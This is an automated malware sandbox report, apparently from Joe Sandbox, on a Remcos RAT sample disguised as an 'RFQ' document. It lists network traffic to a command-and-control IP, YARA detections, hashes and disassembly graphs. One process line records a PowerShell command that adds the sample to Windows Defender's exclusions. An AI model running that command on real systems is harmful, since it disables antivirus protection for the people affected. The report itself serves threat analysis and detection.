                          Jan 9, 2025 19:06:28.397166967 CET240449986173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:29.420631886 CET499872404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:29.425635099 CET240449987173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:29.425736904 CET499872404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:29.481602907 CET499872404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:29.486514091 CET240449987173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:50.872519970 CET240449987173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:50.872654915 CET499872404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:50.872711897 CET499872404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:50.877506971 CET240449987173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:51.882330894 CET499882404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:51.887536049 CET240449988173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:51.887624979 CET499882404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:51.892409086 CET499882404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:51.897438049 CET240449988173.211.106.233192.168.2.9
                          Jan 9, 2025 19:07:13.376698017 CET240449988173.211.106.233192.168.2.9
                          Jan 9, 2025 19:07:13.376765013 CET499882404192.168.2.9173.211.106.233

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 9, 2025 19:03:02.320122004 CET1.1.1.1192.168.2.90x55bbNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                          Jan 9, 2025 19:03:02.320122004 CET1.1.1.1192.168.2.90x55bbNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:13:03:04
                          Start date:09/01/2025
                          Path:C:\Users\user\Desktop\RFQ-20241230.pif.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                          Imagebase:0xc30000
                          File size:987'699 bytes
                          MD5 hash:A2800B58845D5F108333E9F7F9C388DD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:13:03:07
                          Start date:09/01/2025
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                          Imagebase:0x1f0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:13:03:07
                          Start date:09/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff70f010000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:13:03:07
                          Start date:09/01/2025
                          Path:C:\Users\user\Desktop\RFQ-20241230.pif.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                          Imagebase:0xf20000
                          File size:987'699 bytes
                          MD5 hash:A2800B58845D5F108333E9F7F9C388DD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:6
                          Start time:13:03:08
                          Start date:09/01/2025
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff72d8c0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:7.2%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:5.5%
                            Total number of Nodes:55
                            Total number of Limit Nodes:7
                            execution_graph 40584 95f2598 40585 95f9880 PostMessageW 40584->40585 40586 95f98ec 40585->40586 40587 137bfe0 40588 137c022 40587->40588 40589 137c028 GetModuleHandleW 40587->40589 40588->40589 40590 137c055 40589->40590 40612 137e080 40613 137e0c6 GetCurrentProcess 40612->40613 40615 137e111 40613->40615 40616 137e118 GetCurrentThread 40613->40616 40615->40616 40617 137e155 GetCurrentProcess 40616->40617 40618 137e14e 40616->40618 40619 137e18b GetCurrentThreadId 40617->40619 40618->40617 40621 137e1e4 40619->40621 40622 7622258 40623 7622292 40622->40623 40624 7622323 40623->40624 40625 762230e 40623->40625 40627 76218bc 3 API calls 40624->40627 40630 76218bc 40625->40630 40629 7622332 40627->40629 40631 76218c7 40630->40631 40632 7622319 40631->40632 40635 7622c78 40631->40635 40641 7622c69 40631->40641 40636 7622c92 40635->40636 40647 76218f8 40635->40647 40638 7622c9f 40636->40638 40639 7622cc6 CreateIconFromResourceEx 40636->40639 40638->40632 40640 7622d46 40639->40640 40640->40632 40642 76218f8 CreateIconFromResourceEx 40641->40642 40643 7622c92 40642->40643 40644 7622c9f 40643->40644 40645 7622cc6 CreateIconFromResourceEx 40643->40645 40644->40632 40646 7622d46 40645->40646 40646->40632 40648 7622cc8 CreateIconFromResourceEx 40647->40648 40649 7622d46 40648->40649 40649->40636 40591 1374668 40592 137467a 40591->40592 40593 1374686 40592->40593 40595 1374778 40592->40595 40596 137479d 40595->40596 40600 1374878 40596->40600 40604 1374888 40596->40604 40602 13748af 40600->40602 40601 137498c 40601->40601 40602->40601 40608 137449c 40602->40608 40606 13748af 40604->40606 40605 137498c 40605->40605 40606->40605 40607 137449c CreateActCtxA 40606->40607 40607->40605 40609 1375918 CreateActCtxA 40608->40609 40611 13759db 40609->40611 40650 137e2c8 DuplicateHandle 40651 137e35e 40650->40651

                            Executed Functions

                            Function 05BD62F8 Relevance: 1.0, Instructions: 985COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 196 5bd62f8-5bd9d0f 199 5bd9ebd-5bd9efc 196->199 200 5bd9d15-5bd9d1b 196->200 225 5bd9efe-5bd9f0e 199->225 226 5bd9f23 199->226 201 5bd9d1d-5bd9d24 200->201 202 5bd9d5c-5bd9d70 200->202 204 5bd9d3e-5bd9d57 call 5bd98e0 201->204 205 5bd9d26-5bd9d33 201->205 206 5bd9d92-5bd9d9b 202->206 207 5bd9d72-5bd9d76 202->207 204->202 205->204 208 5bd9d9d-5bd9daa 206->208 209 5bd9db5-5bd9dd1 206->209 207->206 210 5bd9d78-5bd9d84 207->210 208->209 222 5bd9e79-5bd9e9d 209->222 223 5bd9dd7-5bd9de2 209->223 210->206 219 5bd9d86-5bd9d8c 210->219 219->206 236 5bd9e9f 222->236 237 5bd9ea7-5bd9ea8 222->237 231 5bd9dfa-5bd9e01 223->231 232 5bd9de4-5bd9dea 223->232 227 5bd9f28-5bd9f42 225->227 228 5bd9f10-5bd9f1d 225->228 226->227 241 5bd9f89-5bd9f90 227->241 242 5bd9f44-5bd9f4b 227->242 228->226 233 5bd9e15-5bd9e38 call 5bd61f4 231->233 234 5bd9e03-5bd9e0d 231->234 239 5bd9dec 232->239 240 5bd9dee-5bd9df0 232->240 253 5bd9e49-5bd9e5a 233->253 254 5bd9e3a-5bd9e47 233->254 234->233 236->237 237->199 239->231 240->231 249 5bd9faa-5bd9fb3 241->249 250 5bd9f92-5bd9f9f 241->250 245 5bd9f4d-5bd9f5a 242->245 246 5bd9f65-5bd9f7a 242->246 245->246 246->241 259 5bd9f7c-5bd9f83 246->259 251 5bd9fb9-5bd9fbc 249->251 252 5bd9fb5-5bd9fb7 249->252 250->249 255 5bd9fbd-5bd9fce 251->255 252->255 264 5bd9e67-5bd9e73 253->264 265 5bd9e5c-5bd9e5f 253->265 254->253 254->264 267 5bda011-5bda014 255->267 268 5bd9fd0-5bd9fd7 255->268 259->241 263 5bda017 259->263 266 5bda01c-5bda042 263->266 264->222 264->223 265->264 277 5bda049-5bda08d 266->277 270 5bd9fd9-5bd9fe6 268->270 271 5bd9ff1-5bda006 268->271 270->271 271->267 276 5bda008-5bda00f 271->276 276->267 276->277 277->266 285 5bda08f-5bda0aa 277->285 286 5bda0ac-5bda0bf 285->286 287 5bda0c2-5bda0c8 285->287 288 5bda138-5bda190 287->288 289 5bda0ca-5bda0d1 287->289 291 5bda197-5bda1ef 288->291 289->291 292 5bda0d7-5bda0e7 289->292 298 5bda1f6-5bda26e 291->298 297 5bda0ed-5bda0f1 292->297 292->298 300 5bda0f4-5bda0f6 297->300 330 5bda274-5bda2e5 298->330 302 5bda0f8-5bda108 300->302 303 5bda11b-5bda11d 300->303 312 5bda10a-5bda119 302->312 313 5bda0f3 302->313 306 5bda12c-5bda135 303->306 307 5bda11f-5bda129 303->307 312->303 312->313 313->300 339 5bda2e7-5bda304 330->339 340 5bda356-5bda3ae 339->340 341 5bda306-5bda316 339->341 345 5bda3b5-5bda4a4 340->345 344 5bda31c-5bda320 341->344 341->345 347 5bda323-5bda325 344->347 379 5bda525-5bda530 345->379 380 5bda4a6-5bda4c2 345->380 349 5bda339-5bda33b 347->349 350 5bda327-5bda337 347->350 351 5bda33d-5bda347 349->351 352 5bda34a-5bda353 349->352 350->349 356 5bda322 350->356 356->347 389 5bda4ff 379->389 390 5bda532-5bda53f 379->390 381 5bda4da-5bda4e0 380->381 382 5bda4c4-5bda4d7 380->382 383 5bda55a-5bda5b2 381->383 384 5bda4e2-5bda4e9 381->384 387 5bda5b9-5bda611 383->387 386 5bda4ef-5bda4f3 384->386 384->387 391 5bda4f9-5bda4fd 386->391 392 5bda618-5bda71c 386->392 387->392 393 5bda500-5bda50d 389->393 397 5bda54e-5bda557 390->397 398 5bda541-5bda54b 390->398 391->393 434 5bda71e-5bda722 392->434 435 5bda778-5bda7d0 392->435 393->390 403 5bda50f-5bda51f 393->403 403->389 409 5bda521-5bda523 403->409 409->379 436 5bda728-5bda72c 434->436 437 5bda7d7-5bda848 434->437 435->437 438 5bda72f-5bda73c 436->438 464 5bda84d-5bda8b8 437->464 443 5bda73e-5bda74e 438->443 444 5bda750-5bda75d 438->444 443->444 451 5bda72e 443->451 452 5bda76c-5bda775 444->452 453 5bda75f-5bda769 444->453 451->438 473 5bda8ba-5bda8bc 464->473 474 5bda901-5bda906 464->474 473->464 475 5bda8be-5bda8e9 473->475
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2ec53d6a04b0df61c3e6f2e9b44c1799bcc36ac7ce22e2d03cb811a00901fec1
                            • Instruction ID: 48f827de113c7c541e7aa5f49d345044a808f723442c9e7753ecf00e38751b55
                            • Opcode Fuzzy Hash: 2ec53d6a04b0df61c3e6f2e9b44c1799bcc36ac7ce22e2d03cb811a00901fec1
                            • Instruction Fuzzy Hash: 9D72C130B046158FDB05EB78C854B6EB7A7FF89210F2885A9D416DB3A4DF34EC4687A1
                            Function 05BD61C4 Relevance: .6, Instructions: 648COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 772 5bd61c4-5bdcc3b 775 5bdcc41-5bdcc4b 772->775 776 5bdcf92-5bdcfe7 772->776 777 5bdcc4d-5bdcc5e 775->777 778 5bdcc69-5bdcc7d 775->778 793 5bdcfe9-5bdcff0 776->793 794 5bdcff2-5bdcffa 776->794 777->778 778->776 783 5bdcc83-5bdcc95 778->783 784 5bdcc97-5bdcc9e 783->784 785 5bdcca1-5bdccb1 783->785 789 5bdcccb-5bdcce6 785->789 790 5bdccb3-5bdccc8 785->790 791 5bdcd3f-5bdcd49 789->791 792 5bdcce8-5bdccf8 789->792 797 5bdcd4b-5bdcd5c 791->797 798 5bdcd67-5bdcd7f 791->798 795 5bdccfa-5bdcd23 call 5bd1c64 792->795 796 5bdcd25-5bdcd3c call 5bd1c64 792->796 793->794 799 5bdd020-5bdd0c1 793->799 800 5bdcffc-5bdd003 794->800 801 5bdd009-5bdd012 794->801 795->791 796->791 797->798 811 5bdcf25-5bdcf28 798->811 812 5bdcd85-5bdcd8f 798->812 804 5bdd0c8-5bdd1cc 799->804 800->801 800->804 805 5bdd018-5bdd01d 801->805 893 5bdd346-5bdd34d 804->893 894 5bdd1d2-5bdd1d9 804->894 814 5bdcf2f-5bdcf35 811->814 815 5bdcf2a 811->815 816 5bdcdad-5bdcdcb call 5bd1c74 812->816 817 5bdcd91-5bdcda2 812->817 821 5bdcf3c-5bdcf45 814->821 822 5bdcf37 814->822 815->814 836 5bdcf1b-5bdcf1f 816->836 837 5bdcdd1-5bdcde0 816->837 817->816 826 5bdcf5e-5bdcf7c 821->826 827 5bdcf47-5bdcf59 call 5bd1c84 821->827 822->821 826->776 827->826 836->811 836->812 839 5bdcde6-5bdcdf0 837->839 840 5bdcea2-5bdceac 837->840 841 5bdce0e-5bdce2b call 5bd1c74 call 5bd52a8 839->841 842 5bdcdf2-5bdce03 839->842 843 5bdceae-5bdcebf 840->843 844 5bdceca-5bdcee7 call 5bd1c74 call 5bd52a8 840->844 862 5bdce2d-5bdce33 841->862 863 5bdce43-5bdce4f 841->863 842->841 843->844 860 5bdceff-5bdcf13 844->860 861 5bdcee9-5bdceef 844->861 878 5bdcf15 860->878 879 5bdcf17 860->879 866 5bdcef1 861->866 867 5bdcef3-5bdcef5 861->867 868 5bdce35 862->868 869 5bdce37-5bdce39 862->869 870 5bdce6d-5bdce98 call 5bd1c74 863->870 871 5bdce51-5bdce62 863->871 866->860 867->860 868->863 869->863 888 5bdce9c 870->888 889 5bdce9a 870->889 871->870 880 5bdcf19 878->880 879->880 880->836 890 5bdce9e-5bdcea0 888->890 889->890 890->836 895 5bdd1db-5bdd1e6 894->895 896 5bdd242-5bdd252 894->896 895->896 899 5bdd1e8-5bdd1f2 895->899 897 5bdd25c 896->897 898 5bdd254-5bdd25a 896->898 900 5bdd262-5bdd268 897->900 898->900 901 5bdd1f4-5bdd210 899->901 902 5bdd212 899->902 904 5bdd26e-5bdd281 900->904 905 5bdd332-5bdd33d 900->905 903 5bdd217-5bdd219 901->903 902->903 903->896 906 5bdd21b-5bdd23c call 5bd9b9c 903->906 907 5bdd28f-5bdd296 904->907 905->893 906->896 912 5bdd357-5bdd3c8 906->912 909 5bdd298-5bdd2a5 907->909 910 5bdd2b0-5bdd2c0 907->910 909->910 915 5bdd283-5bdd289 call 5bd9bac 910->915 916 5bdd2c2-5bdd2c9 910->916 935 5bdd3ca-5bdd3db 912->935 936 5bdd3e6-5bdd40d call 5bd1c74 912->936 921 5bdd28e 915->921 917 5bdd2cb-5bdd2d8 916->917 918 5bdd2e3-5bdd2fa 916->918 917->918 925 5bdd30c-5bdd330 918->925 926 5bdd2fc-5bdd30a call 5bd9bbc 918->926 921->907 925->905 926->925 935->936 941 5bdd52f-5bdd535 936->941 942 5bdd413-5bdd419 936->942 945 5bdd537-5bdd53d call 5bd9bcc 941->945 946 5bdd542-5bdd547 941->946 943 5bdd41f-5bdd45b call 5bd9bcc 942->943 944 5bdd4cb-5bdd4d5 942->944 943->944 947 5bdd4d7-5bdd4e8 944->947 948 5bdd4f3-5bdd50e call 5bd1c74 944->948 945->946 947->948 956 5bdd514-5bdd51c 948->956 958 5bdd521 call 5bdd551 956->958 959 5bdd521 call 5bdd560 956->959 957 5bdd527-5bdd52c 958->957 959->957
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3d38d97cf3d7e78a45712290b7f34688b1b18aeb98428a389f58a699fbcaa7c4
                            • Instruction ID: a9c797b977a7fb3b8c2ca483bd259ec23589234ab1b3bcfcb3bbaba28a4ea4a2
                            • Opcode Fuzzy Hash: 3d38d97cf3d7e78a45712290b7f34688b1b18aeb98428a389f58a699fbcaa7c4
                            • Instruction Fuzzy Hash: 0E425D31A00209DFDB14DB68D854BADBBB2FF89310F2581A5E445EB3A1DB35AD45CBA0
                            Function 076218BC Relevance: .6, Instructions: 621COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 960 76218bc-7622378 963 762285b-76228c4 960->963 964 762237e-7622383 960->964 971 76228cb-7622953 963->971 964->963 965 7622389-76223a6 964->965 965->971 972 76223ac-76223b0 965->972 1014 762295e-76229de 971->1014 973 76223b2-76223bc 972->973 974 76223bf-76223c3 972->974 973->974 975 76223d2-76223d9 974->975 976 76223c5-76223cf 974->976 980 76224f4-76224f9 975->980 981 76223df-762240f 975->981 976->975 983 7622501-7622506 980->983 984 76224fb-76224ff 980->984 992 7622bde-7622c04 981->992 994 7622415-76224e8 call 76218cc * 2 981->994 988 7622518-7622548 call 76218d8 * 3 983->988 984->983 987 7622508-762250c 984->987 991 7622512-7622515 987->991 987->992 988->1014 1015 762254e-7622551 988->1015 991->988 1007 7622c06-7622c12 992->1007 1008 7622c14 992->1008 994->980 1023 76224ea 994->1023 1011 7622c17-7622c1c 1007->1011 1008->1011 1030 76229e5-7622a67 1014->1030 1015->1014 1018 7622557-7622559 1015->1018 1018->1014 1019 762255f-7622594 1018->1019 1019->1030 1031 762259a-76225a3 1019->1031 1023->980 1037 7622a6f-7622af1 1030->1037 1033 7622706-762270a 1031->1033 1034 76225a9-7622603 call 76218d8 * 2 call 76218e8 * 2 1031->1034 1036 7622710-7622714 1033->1036 1033->1037 1075 7622615 1034->1075 1076 7622605-762260e 1034->1076 1040 762271a-7622720 1036->1040 1041 7622af9-7622b26 1036->1041 1037->1041 1045 7622722 1040->1045 1046 7622724-7622759 1040->1046 1054 7622b2d-7622bad 1041->1054 1050 7622760-7622766 1045->1050 1046->1050 1053 762276c-7622774 1050->1053 1050->1054 1058 7622776-762277a 1053->1058 1059 762277b-762277d 1053->1059 1109 7622bb4-7622bd6 1054->1109 1058->1059 1065 76227df-76227e5 1059->1065 1066 762277f-76227a3 1059->1066 1071 76227e7-7622802 1065->1071 1072 7622804-7622832 1065->1072 1098 76227a5-76227aa 1066->1098 1099 76227ac-76227b0 1066->1099 1091 762283a-7622846 1071->1091 1072->1091 1083 7622619-762261b 1075->1083 1082 7622610-7622613 1076->1082 1076->1083 1082->1083 1089 7622622-7622626 1083->1089 1090 762261d 1083->1090 1095 7622634-762263a 1089->1095 1096 7622628-762262f 1089->1096 1090->1089 1091->1109 1110 762284c-7622858 1091->1110 1103 7622644-7622649 1095->1103 1104 762263c-7622642 1095->1104 1102 76226d1-76226d5 1096->1102 1106 76227bc-76227cd 1098->1106 1099->992 1107 76227b6-76227b9 1099->1107 1111 76226d7-76226f1 1102->1111 1112 76226f4-7622700 1102->1112 1113 762264f-7622655 1103->1113 1104->1113 1148 76227cf call 7622c78 1106->1148 1149 76227cf call 7622c69 1106->1149 1107->1106 1109->992 1111->1112 1112->1033 1112->1034 1119 7622657-7622659 1113->1119 1120 762265b-7622660 1113->1120 1116 76227d5-76227dd 1116->1091 1124 7622662-7622674 1119->1124 1120->1124 1128 7622676-762267c 1124->1128 1129 762267e-7622683 1124->1129 1131 7622689-7622690 1128->1131 1129->1131 1135 7622692-7622694 1131->1135 1136 7622696 1131->1136 1139 762269b-76226a6 1135->1139 1136->1139 1140 76226ca 1139->1140 1141 76226a8-76226ab 1139->1141 1140->1102 1141->1102 1143 76226ad-76226b3 1141->1143 1145 76226b5-76226b8 1143->1145 1146 76226ba-76226c3 1143->1146 1145->1140 1145->1146 1146->1102 1147 76226c5-76226c8 1146->1147 1147->1102 1147->1140 1148->1116 1149->1116
                            Memory Dump Source
                            • Source File: 00000000.00000002.1365368010.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7620000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a5c07a1dca1f1947190b6e1d4a9c15a8034cad10a2dad2b0b339e9bfdadf53b
                            • Instruction ID: 33b7e56596db7b5fa9fc254f084b29cad4a070f44cf8da590fcb343bdd7b539d
                            • Opcode Fuzzy Hash: 3a5c07a1dca1f1947190b6e1d4a9c15a8034cad10a2dad2b0b339e9bfdadf53b
                            • Instruction Fuzzy Hash: DB326E71A00629CFDB54DFB8C4507AEBBF2BF89300F15856AD40AAB384DA349C86DF55
                            Function 07622340 Relevance: .3, Instructions: 282COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1365368010.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7620000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a189ecffc0304f54d10c3c836ce68aadac03230d249fa5c1e5694941bc9d35ed
                            • Instruction ID: d2ce9a960f94b0e3a188fa974cf2921ce8b1946341684337ea0f0bc2b38a23ac
                            • Opcode Fuzzy Hash: a189ecffc0304f54d10c3c836ce68aadac03230d249fa5c1e5694941bc9d35ed
                            • Instruction Fuzzy Hash: EBC18CB1E00629CFCB64CF65C89079DBBF2BF89300F15C1A9D40AAB255EB349986DF51
                            Function 01377AA8 Relevance: .2, Instructions: 189COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e112bdc5f3018995ceeec1be54ab81bd70e57df8c55d2901eaa16e1a4de7ac1e
                            • Instruction ID: c780ae31bbef4509046f3e0b4d7d7c4a904c53c354fd446113cece06b9375e5c
                            • Opcode Fuzzy Hash: e112bdc5f3018995ceeec1be54ab81bd70e57df8c55d2901eaa16e1a4de7ac1e
                            • Instruction Fuzzy Hash: 23817E74E00219DFDB55DFA9D884AAEBBF2FF88300F20812AE419AB355DB345945CF51
                            Function 01375E6C Relevance: .2, Instructions: 185COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3968025cc1e62d769b15ce21d639752b9c0aeb922bd4624de78c1179c42991a3
                            • Instruction ID: fda44e3487dfbbd44ab9d98fa9927139b4d9e935beb2c627ee5c1fb21f29e5aa
                            • Opcode Fuzzy Hash: 3968025cc1e62d769b15ce21d639752b9c0aeb922bd4624de78c1179c42991a3
                            • Instruction Fuzzy Hash: 3F816E74E00219DFDB54DFA9D884AAEBBF2FF88300F208129E419AB355DB385945CF51
                            Function 0137E080 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 0137E0FE
                            • GetCurrentThread.KERNEL32 ref: 0137E13B
                            • GetCurrentProcess.KERNEL32 ref: 0137E178
                            • GetCurrentThreadId.KERNEL32 ref: 0137E1D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: e8ff27c9b065cec6983ff0319003b72ac7b92f1ade1399119aa9dba260b9a213
                            • Instruction ID: f31d804d11d02d62fcf17c748d64844d8c9bd7ffc516e8bf26d8a65db08a7f7a
                            • Opcode Fuzzy Hash: e8ff27c9b065cec6983ff0319003b72ac7b92f1ade1399119aa9dba260b9a213
                            • Instruction Fuzzy Hash: 7E5156B09007098FEB18CFAAD548BDEBBF1FF88314F208469E419AB3A0D7745944CB65
                            Function 0137590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 21 137590c-13759d9 CreateActCtxA 23 13759e2-1375a3c 21->23 24 13759db-13759e1 21->24 31 1375a3e-1375a41 23->31 32 1375a4b-1375a4f 23->32 24->23 31->32 33 1375a51-1375a5d 32->33 34 1375a60 32->34 33->34 36 1375a61 34->36 36->36
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 013759C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 09a822697bd00beb6a307339ad3dd607166b9c83cdbf21e645c19f085079a7a1
                            • Instruction ID: 295a5c751697071e2231b2c774d6a8569cfca454a927d037286797d8f530d436
                            • Opcode Fuzzy Hash: 09a822697bd00beb6a307339ad3dd607166b9c83cdbf21e645c19f085079a7a1
